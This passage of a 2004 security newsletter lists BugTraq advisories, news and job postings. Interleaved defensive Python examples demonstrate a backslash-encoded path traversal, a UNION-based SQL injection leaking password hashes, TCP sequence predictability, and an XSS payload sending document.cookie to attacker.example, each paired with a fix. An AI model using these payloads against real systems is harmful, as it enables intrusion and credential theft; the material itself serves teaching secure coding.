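import ntpath
import posixpath
import re
from urllib.parse import unquote

DOCROOT = r"C:\thttpd\htdocs"  # assumed document root, for illustration only


def naive_resolve(docroot: str, url_path: str):
    """A Unix-minded containment check: only '/' is treated as a separator.

    Returns the file path it would open, or None if it believes the request
    escapes the document root. On Windows this belief can be wrong.
    """
    path = unquote(url_path)
    # '/../x' normalises to '/x' here, so forward-slash traversal is clamped...
    norm = posixpath.normpath("/" + path.lstrip("/"))
    full = posixpath.join(docroot, norm.lstrip("/"))
    # ...and the string-prefix test looks convincing.
    if full != docroot and not full.startswith(docroot + "/"):
        return None
    return full


def opens_on_windows(path: str) -> str:
    """Where the Windows file API would actually land for the given string."""
    return ntpath.normpath(path)


def safe_resolve(docroot: str, url_path: str):
    """Containment check that honours Windows path semantics.

    Both '/' and '\\' split components, drive letters and UNC prefixes are
    refused, no component may be '..' or contain ':', and the final absolute
    path is verified against the normalised root as a last line of defence.
    """
    path = unquote(url_path)
    if ntpath.splitdrive(path)[0] or path.startswith("//"):
        return None  # 'C:...', '\\\\server\\share'
    parts = [p for p in re.split(r"[\\/]+", path) if p not in ("", ".")]
    if any(p == ".." or ":" in p for p in parts):
        return None  # traversal, drive or alternate data stream syntax
    root = ntpath.normpath(docroot)
    full = ntpath.normpath(ntpath.join(root, *parts))
    if full != root and not full.lower().startswith(root.lower() + "\\"):
        return None
    return full


if __name__ == "__main__":
    attack = "/..%5c..%5cwindows%5cwin.ini"  # constructed request: %5c is a backslash
    print(naive_resolve(DOCROOT, attack))  # accepted by the naive check
    print(opens_on_windows(naive_resolve(DOCROOT, attack)))  # C:\windows\win.ini
    print(safe_resolve(DOCROOT, attack))  # None
    print(safe_resolve(DOCROOT, "/docs/index.html"))
```

The naive check clamps "/../../windows/win.ini" to a path inside the document root and so looks correct under test on Unix; fed the same traversal with %5c-encoded backslashes it still believes the path is contained, while the operating system opens C:\windows\win.ini. The safe version treats both separators as separators and rejects rather than clamps.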
27. Multiple Free Web Chat Denial Of Service Vulnerabilities
BugTraq ID: 10863
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10863
Summary:
Free Web Chat server is reported prone to multiple denial of service vulnerabilities. The following issues are reported:
The first denial of service vulnerability results from a lack of sufficient sanitization of username data. It is reported that a user with a void (null) name may be added, which results in a NullPointerException.
A remote attacker may exploit this vulnerability to deny service to legitimate users.
The second denial of service vulnerability is reported to exist due to resource consumption. It is reported that the Free Web Chat server does not properly manage multiple connections that originate from the same location.
A remote attacker may exploit this vulnerability to deny service to legitimate users.
28. Gnome VFS 'extfs' Scripts Undisclosed Vulnerability
BugTraq ID: 10864
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10864
Summary:
Gnome VFS's 'extfs' scripts are reported prone to an undisclosed vulnerability.
It is reported that a user that views specially crafted, attacker supplied URIs utilizing the 'extfs' VFS module may be able to execute arbitrary commands in the context of the user.
This BID will be updated as further information is disclosed.
29. Gaim Multiple Unspecified MSN Protocol Buffer Overflow Vulne...
BugTraq ID: 10865
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10865
Summary:
It is reported that there are multiple unspecified buffer overflow vulnerabilities in the MSN protocol module in Gaim.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
30. LILO gfxboot Plaintext Password Display Vulnerability
BugTraq ID: 10866
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10866
Summary:
Reportedly gfxboot is affected by a plaintext password display vulnerability. This issue is due to a design error that fails to protect user passwords.
The LILO boot password is reportedly echoed to the screen in plaintext as it is typed.
An attacker with access to the console might leverage this issue to read the plaintext LILO boot password.
31. YaST2 Utility Library File Verification Shell Code Injection...
BugTraq ID: 10867
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10867
Summary:
The YaST2 utility library 'liby2util' is affected by a file verification shell command injection vulnerability. This issue is due to a design error that fails to properly validate files.
An attacker could leverage this issue to inject shell commands through the name of a file being transferred using the vulnerable utility. This might facilitate privilege escalation and unauthorized access.
32. phpBB Fetch All SQL Injection Vulnerability
BugTraq ID: 10868
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10868
Summary:
It is reported that phpBB Fetch All is susceptible to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input before using it in an SQL query.
The successful exploitation of this vulnerability depends on the implementation of the web application that includes phpBB Fetch All as a component. It may or may not be possible to effectively pass malicious SQL statements to the underlying function.
Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Versions prior to 2.0.12 are reported to be affected.
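The advisory's caveat that exploitability "depends on the implementation of the web application that includes phpBB Fetch All as a component" is the interesting point: a library helper that pastes its argument into a query is only as safe as its callers. The Python/sqlite3 code below is an added example, not phpBB Fetch All's code or schema, and its tables, rows and attacker string are constructed; it contrasts the concatenating helper with a parameterised one and shows the caller-side check that a careful application would perform before calling either.

```python
import sqlite3

# Constructed schema and rows standing in for a forum database; not phpBB's schema.
SCHEMA = """
CREATE TABLE posts (post_id INTEGER PRIMARY KEY, forum_id INTEGER, subject TEXT);
CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO posts VALUES (1, 1, 'Welcome'), (2, 1, 'Rules'), (3, 2, 'Off topic');
INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-secret'), (2, 'bob', 'hash-of-bob-secret');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_subjects_vulnerable(conn, forum_id):
    """The library-style helper as the advisory describes it: the caller's
    value is pasted straight into the statement. Whether this is exploitable
    depends entirely on what the calling application passes in."""
    sql = "SELECT subject FROM posts WHERE forum_id = %s" % forum_id
    return [row[0] for row in conn.execute(sql)]


def fetch_subjects_safe(conn, forum_id):
    """Same query with a bound parameter: the value can never become SQL."""
    return [row[0] for row in conn.execute(
        "SELECT subject FROM posts WHERE forum_id = ?", (forum_id,))]


def forum_id_from_request(raw: str) -> int:
    """What a careful caller does before handing the value to the helper."""
    return int(raw)  # raises ValueError for anything that is not an integer


PAYLOAD = "0 UNION SELECT password_hash FROM users"  # constructed attacker input


if __name__ == "__main__":
    conn = open_db()
    print(fetch_subjects_vulnerable(conn, "1"))
    print(fetch_subjects_vulnerable(conn, PAYLOAD))  # leaks password hashes
    print(fetch_subjects_safe(conn, PAYLOAD))  # []
    print(fetch_subjects_safe(conn, forum_id_from_request("1")))
```

With the concatenating helper the UNION appends the users table's hashes to the result set; with the bound parameter the same string is compared, as text, against an integer column and matches nothing. The caller-side int() conversion is what makes even the concatenating helper unreachable by this payload, which is exactly the "may or may not be possible" situation the advisory describes.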
33. Neon WebDAV Client Library Unspecified Vulnerability
BugTraq ID: 10869
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10869
Summary:
It is reported that Neon contains an unspecified vulnerability. The cause of this vulnerability is currently unknown.
Due to the nature of the library, it is likely that this is a remotely exploitable issue.
The effects and impact of this issue are currently unknown. This BID will be updated immediately when more information becomes available.
34. PSCP Modpow Base Integer Handling Buffer Overrun Vulnerabili...
BugTraq ID: 10870
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10870
Summary:
PSCP is reported prone to a buffer overrun vulnerability.
An attacker might leverage this issue to execute arbitrary code on an affected system. As this issue is triggered before any authentication takes place and before the host key is verified, a malicious or spoofed server can exploit this to gain unauthorized access to a vulnerable computer with the privileges of the user that started the affected application.
35. Oracle Multiple Unspecified Vulnerabilities
BugTraq ID: 10871
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10871
Summary:
It has been reported that multiple Oracle products contain multiple vulnerabilities, none of which has been publicly detailed.
The reported vulnerabilities include SQL injection, buffer overflows, and others.
Details about any of the vulnerabilities are unknown at this time. This BID will be updated and split into individual BIDs as further information is disclosed.
36. LibPNG Graphics Library Unspecified Remote Buffer Overflow V...
BugTraq ID: 10872
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10872
Summary:
Reportedly LibPNG contains a buffer offset calculation error that may facilitate a buffer overflow vulnerability. This issue is due to a logical design error.
This vulnerability may allow an attacker to crash applications utilizing the library, or potentially allow code execution.
Please note that vulnerabilities previously outlined in this BID have been described in the LibPNG Graphics Library Multiple Remote Vulnerabilities outlined in BID 10857.
37. Opera Remote Location Object Cross-Domain Scripting Vulnerab...
BugTraq ID: 10873
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10873
Summary:
Opera is affected by a remote location object cross-domain scripting vulnerability. This issue is due to a failure to properly restrict cross-domain access to 'location' object methods.
An attacker might leverage this issue to steal cookie-based authentication credentials, conduct phishing attacks and carry out other attacks. Furthermore, provided there is an HTML document invoking 'location' methods local to a victim's computer (such as c:/winnt/help/ciadmin.htm in most Microsoft Windows installations), an attacker can exploit this issue to gain read access to directory contents, files and email read using Opera's email utilities.
Although this issue is reported to affect versions 7.52 and 7.53 of the affected software, it is likely that earlier versions are also affected.
38. Mozilla Browser Input Type HTML Tag Unauthorized Access Vuln...
BugTraq ID: 10874
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10874
Summary:
Mozilla browser is reportedly affected by an input type HTML tag unauthorized access vulnerability. This issue is due to an access validation error that allows access to arbitrary files on an unsuspecting user's system.
This issue will allow an attacker to obtain arbitrary files residing on the computer of an unsuspecting user that activates a malicious script.
39. Mozilla Browser/Thunderbird SendUIDL POP3 Message Handling R...
BugTraq ID: 10875
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10875
Summary:
Mozilla and Mozilla Thunderbird are reported prone to a remote heap overflow vulnerability. The issue is reported to exist due to a lack of sufficient boundary checks performed on POP3 data handled by SendUidl().
An attacker-controlled POP3 mail server may exploit this condition by returning specially crafted POP3 data to the affected mail client. This will result in the corruption of heap-based memory.
40. Mozilla Browser Non-FQDN SSL Certificate Spoofing Vulnerabil...
BugTraq ID: 10876
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10876
Summary:
Mozilla browser is reportedly vulnerable to an SSL certificate spoofing vulnerability in the 'cert_TestHostName()' function. This issue is due to a design error that fails to properly validate certificate host names.
This issue would allow an attacker to spoof a trusted certificate from a third party site, facilitating phishing style attacks by luring an unsuspecting user to enter information on what is apparently a trusted site.
41. CVSTrac filediff Remote Command Execution Vulnerability
BugTraq ID: 10878
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10878
Summary:
CVSTrac is affected by a remote command execution vulnerability in the 'filediff' functionality. This issue is due to an input validation error that allows for the appending of shell commands.
An attacker could leverage this issue to execute arbitrary shell commands on a vulnerable computer with the privileges of the web server process.
42. Microsoft Internet Explorer mms Protocol Handler Executable ...
BugTraq ID: 10879
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10879
Summary:
A vulnerability has been reported to exist in Microsoft Internet Explorer that may allow remote attackers to pass arbitrary command line arguments to an application associated with the mms: URI protocol handler. Windows Media Player is the application normally associated with this URI protocol handler.
This vulnerability would permit an attacker to influence the invocation arguments for the executable and could result in the compromise of various security properties. This may be exploited from a malicious Web page or possibly through HTML email.
It is not known if this issue is specific to the mms: URI protocol handler or if other URI protocol handlers on the system may be similarly affected. This vulnerability could be a general issue in Internet Explorer with many possible attack vectors, although there is not enough information available at this time to make this determination.
43. Mozilla SSL Redirect Spoofing Vulnerability
BugTraq ID: 10880
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10880
Summary:
It is reported that Mozilla, and products derived from Mozilla are susceptible to an SSL redirect spoofing vulnerability.
By exploiting this vulnerability, an attacker can ensure that the victim's browser displays the SSL lock icon, and shows the SSL certificate information of a legitimate site when the lock is clicked on.
This vulnerability may aid in Phishing style attacks.
Mozilla prior to 1.7, Mozilla Firebird 0.7, Mozilla Firefox prior to 0.9, and Mozilla Thunderbird prior to 0.7 are all reported vulnerable.
44. Thomson SpeedTouch Home ADSL Modem Predictable Initial TCP S...
BugTraq ID: 10881
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10881
Summary:
A vulnerability is reported to exist in the algorithms used by Thomson SpeedTouch Home ADSL Modem to generate initial TCP sequence numbers. The ability to predict TCP sequence numbers may allow a remote attacker to inject packets into a vulnerable data stream, for example the telnet service on the affected modem.
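Whether an ISN generator is "predictable" is something a practitioner can measure from a sample of observed ISNs, in the spirit of the sequence-predictability analysis tools such as nmap perform. The Python below is an added example, not from the advisory and not the modem's algorithm: it takes a list of consecutive ISNs, predicts each one from the previous step, and reports the median miss as the window an attacker would have to search when injecting a spoofed segment. Both ISN sources are constructed stand-ins, one counter-style and one random; the 4096 threshold for "predictable" is an assumption chosen for illustration.

```python
import random
import statistics

MOD32 = 1 << 32


def isn_deltas(isns):
    """Differences between consecutive ISNs, modulo 2^32."""
    return [(b - a) % MOD32 for a, b in zip(isns, isns[1:])]


def predict_next(isns):
    """Simplest useful predictor: the next ISN continues the last step."""
    return (isns[-1] + isn_deltas(isns)[-1]) % MOD32


def prediction_window(isns):
    """Median distance between the predicted and the real ISN over the sample.

    This is roughly the number of sequence numbers an attacker must try
    (either side of the predicted value) for a spoofed segment to land in
    the victim's window. Small means predictable.
    """
    errors = []
    for i in range(2, len(isns)):
        diff = (isns[i] - predict_next(isns[:i])) % MOD32
        errors.append(min(diff, MOD32 - diff))
    return int(statistics.median(errors))


def classify(isns):
    """Assumed threshold: a window under 4096 makes blind injection practical."""
    return "predictable" if prediction_window(isns) < 4096 else "unpredictable"


def weak_generator(n, seed=1):
    """Constructed stand-in for a counter-style ISN source: +64000 per
    connection with a little clock jitter. Not the modem's actual algorithm."""
    rng = random.Random(seed)
    isn, out = 0x1000, []
    for _ in range(n):
        isn = (isn + 64000 + rng.randint(0, 15)) % MOD32
        out.append(isn)
    return out


def strong_generator(n, seed=1):
    """Constructed stand-in for a randomised ISN source."""
    rng = random.Random(seed)
    return [rng.getrandbits(32) for _ in range(n)]


if __name__ == "__main__":
    for name, sample in (("weak", weak_generator(50)), ("strong", strong_generator(50))):
        print(name, prediction_window(sample), classify(sample))
```

For the counter-style source the predictor misses by at most the jitter, so an attacker who has opened one connection to the modem can spoof the next client's session with a handful of guesses; for the randomised source the median miss is on the order of 2^30, which is why modern stacks derive ISNs from a keyed hash of the connection tuple plus a clock.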
45. GNU Info Follow XRef Buffer Overrun Vulnerability
BugTraq ID: 10882
Remote: No
Date Published: Aug 06 2004
Relevant URL: http://www.securityfocus.com/bid/10882
Summary:
GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command.
An attacker may exploit this vulnerability by crafting a malicious Info file that is sufficient to trigger the issue.
Although this vulnerability is reported to affect info version 4.7-2.1, other versions might also be affected.
46. phpBB Login.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 10883
Remote: Yes
Date Published: Aug 06 2004
Relevant URL: http://www.securityfocus.com/bid/10883
Summary:
phpBB is affected by a cross-site scripting vulnerability in the 'login.php' script. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This can be exploited by constructing links that pass malicious strings through the affected URI parameter. If an unsuspecting user visits such a link, the malicious, externally created content supplied in the link will be rendered (or executed, in the case of script code) as part of the 'login.php' document and within the context of the vulnerable website (including the phpBB forum).
Attackers may exploit this vulnerability to obtain the authentication credentials of other forum users. If the domain hosts other applications, their credentials and/or other sensitive information (session IDs, etc) may be exposed.
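The three reflected cross-site scripting entries in this issue (eNdonesia 'mod.php', WackoWiki textsearch and phpBB 'login.php') share one root cause: a URI parameter is copied into the page without encoding for the context it lands in. The Python below is an added example, not phpBB code; the parameter name 'redirect' and the hidden-field template are assumptions (the advisory does not name the parameter), and the attacker string is constructed. It renders the page both ways and uses the standard-library HTML parser to show what a browser would see.

```python
import html
from html.parser import HTMLParser

# Constructed attacker input for a hypothetical 'redirect' parameter of login.php.
# It opens with a double quote so that it closes the attribute it is reflected into.
PAYLOAD = '"><script>new Image().src="http://attacker.example/c?"+document.cookie;</script><a b="'

TEMPLATE = ('<form action="login.php" method="post">'
            '<input type="hidden" name="redirect" value="%s">'
            '<input type="submit" value="Log in"></form>')


def render_vulnerable(redirect: str) -> str:
    """Reflects the parameter into the page exactly as received."""
    return TEMPLATE % redirect


def render_hardened(redirect: str) -> str:
    """Encodes for the HTML attribute context before reflecting it.

    quote=True is what matters here: without it the leading double quote in
    the payload would still terminate the value attribute.
    """
    return TEMPLATE % html.escape(redirect, quote=True)


class TagCollector(HTMLParser):
    """Records the tags and input values the browser would end up with."""

    def __init__(self):
        super().__init__()
        self.tags, self.inputs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            a = dict(attrs)
            self.inputs[a.get("name", "")] = a.get("value", "")


def parse(page: str) -> TagCollector:
    p = TagCollector()
    p.feed(page)
    p.close()
    return p


if __name__ == "__main__":
    v, h = parse(render_vulnerable(PAYLOAD)), parse(render_hardened(PAYLOAD))
    print(v.tags)  # a 'script' element now exists in the page
    print(h.tags)  # form, input, input: nothing but the template's own elements
    print(h.inputs["redirect"] == PAYLOAD)  # the value round-trips intact
```

The hardened page still carries the attacker's string, but as an attribute value rather than as markup, which is the whole point: the fix is output encoding matched to the context, not rejecting "dangerous" characters.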
III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Wardriving guilty plea in Lowe's wi-fi case
By: Kevin Poulsen
Federal prosecutors say a network engineer convicted for checking his e-mail over a hardware store's wi-fi network is likely the first U.S. wardriving conviction.
http://www.securityfocus.com/news/9281
2. Ashcroft wins Internet wiretap system
By: Kevin Poulsen
U.S. regulators vote to wire broadband networks for law enforcement surveillance.
http://www.securityfocus.com/news/9263
3. ATM keypads get a security boost
By: Kevin Poulsen
Credit card companies are responding to a host of high and low-tech attacks on the sanctity of your ATM code.
http://www.securityfocus.com/news/9161
4. Phishermen attack on a viral scale
By: John Leyden, The Register
The prevalence of some phishing attacks is beginning to rival even high-level viral outbreaks, according to email filtering firm MessageLabs.
http://www.securityfocus.com/news/9297
5. Price isn't right for new Bagle variant
By: John Leyden, The Register
Yet another variant of the mass-mailing Bagle worm began spreading widely yesterday.
http://www.securityfocus.com/news/9296
6. Phone spam misery looms Stateside
By: Andrew Orlowski, The Register
A little-noticed Bill before the Senate will ensure daily misery for US cellphone users, thanks to the inattentiveness of telecomms regulator the FCC.
http://www.securityfocus.com/news/9283
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. MonitorMagic - Server & Network Monitor 6.0
By: Tools4ever
Relevant URL: http://www.tools4ever.com/products/monitormagic/
Platforms: Windows 2000, Windows NT, Windows XP
Summary:
MonitorMagic is a proactive server and network monitoring and reporting tool for Windows 2003/XP/2000/NT servers, workstations and SNMP devices and supports agentless monitoring. MonitorMagic supports Windows and UNIX based resources such as memory, disk and CPU load and optionally records the values into a database to enable graphical trending and reporting. MonitorMagic ships with predefined policies for popular hardware and applications.
2. CipherPack Pro 3.2
By: VIO Systems Limited
Relevant URL: http://www.cipherpack.com
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Encrypts and compresses files and data into a single Windows executable. The user just runs it and when the correct key is supplied, the file decrypts. Without the correct key, the original file contents can never be seen.
3. Savungan - Stateful Inspection Firewall for Windows with FUL... 2.0
By: Egemen Tas
Relevant URL: http://www.ModemWall.com/savungan.htm
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Savungan is a stateful inspection firewall designed for Microsoft Windows platforms, available with FULL SOURCE CODE. It is an advanced filtering agent for TCP/IP based networks, with a very flexible rule language that makes packet inspection more powerful and effective. Security administrators have had difficulty building and maintaining a suitable filtering infrastructure after deploying a firewall.
4. SSlDigger 1.0
By: Rudolph Araujo
Relevant URL: http://www.foundstone.com/s3i
Platforms: Windows XP
Summary:
SSL Digger looks at the SSL Ciphers that a web server supports. It produces a report and grades the site.
5. DiskLogon 1.0.17.112
By: DiskLogon Development Team
Relevant URL: http://www.disklogon.com/DiskLogon.exe
Platforms: Windows 2000, Windows XP
Summary:
DiskLogon, like a Smart Card logon, is a software that enables you to log on to your computer with a removable disk.
DiskLogon saves you the trouble of entering your user name and password every time you log on. All you have to do is plug in your removable disk, and you can log on to your computer quickly and safely. When you unplug your removable disk, your computer will automatically lock, for your safety.
6. UndeleteSMS 1.0
By: Arne Vidstrom
Relevant URL: http://vidstrom.net/downloads/undeletesms.exe
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
UndeleteSMS can recover deleted SMS messages from a GSM SIM card.
V. SECURITYJOBS LIST SUMMARY
----------------------------
1. [SJ-JOB] Sr. Security Analyst, Busto Arsizio (VA), I... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370938
2. [SJ-JOB] Jr. Security Analyst, Busto Arsizio (VA), I... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370937
3. [SJ-JOB] CHECK Team Leader, London, GB (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370936
4. [SJ-JOB] Account Manager, San Francisco, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370933
5. [SJ-JOB] Sr. Security Analyst, Clearwater, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370931
6. [SJ-JOB] Chief Security Strategist, Dallas, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370929
7. [SJ-JOB] Security Consultant, Riyadh, SA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370926
8. [SJ-JOB] Quality Assurance, Santa Barbara, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370917
9. [SJ-JOB] Security Product Manager, San Jose, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370915
10. [SJ-JOB] Sr. Security Engineer, Boston, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370777
11. [SJ-JOB] Evangelist, San Jose, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370775
12. [SJ-JOB] Security Consultant, Indianopolis, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370770
13. [SJ-JOB] Account Manager, New York, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370769
14. [SJ-JOB] Security Consultant, Albany, NY, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370766
15. [SJ-JOB] Security Consultant, San Francisco , US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370759
16. [SJ-JOB] Security Engineer, Eatontown, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370753
17. [SJ-JOB] Security Consultant, Houston, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370750
18. [SJ-JOB] Security Engineer, Washington, DC, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370745
19. [SJ-JOB] Security Auditor, Miami, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370744
20. [SJ-JOB] Security Engineer, New York (and NJ Metro A... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370739
21. [SJ-JOB] Management, Irvine, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370737
22. [SJ-JOB] Security Consultant, Albany, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370734
23. [SJ-JOB] Sales Engineer, Atlanta, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370733
24. [SJ-JOB] Security Consultant, New York, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370731
25. [SJ-JOB] Account Manager, Chicago, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370729
26. [SJ-JOB] Sr. Security Engineer, Palo Alto, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370728
VI. INCIDENTS LIST SUMMARY
--------------------------
1. New Mass Mailer Virus (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371322
2. NDR +Hotmail & MSN (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371262
3. distributed spamming/scamming scheme? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371139
4. Anyone else seeing SSH scans? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371086
5. Is this some type of scan (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371085
VII. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
NO NEW POSTS FOR THE WEEK 2004-08-03 to 2004-08-10.
VIII. MICROSOFT FOCUS LIST SUMMARY
----------------------------------
1. most avtive attack type (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/371283
2. SecurityFocus Microsoft Newsletter #200 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/370780
IX. SUN FOCUS LIST SUMMARY
--------------------------
1. Password recovery (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371287
2. How to Restrict a user, not a root, Login to the Con... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371161
3. trouble setting up routing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371160
4. ipv6 questions + solaris 9 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371158
5. syslog logging (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/370904
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. can Hopster traffic be blocked? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/371150
XI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com and ask to be manually removed.
XII. SPONSOR INFORMATION
-----------------------
This issue sponsored by: SPI Dynamics
http://www.securityfocus.com/sponsor/SPIDynamics_sf-news_040810
------------------------------------------------------------------------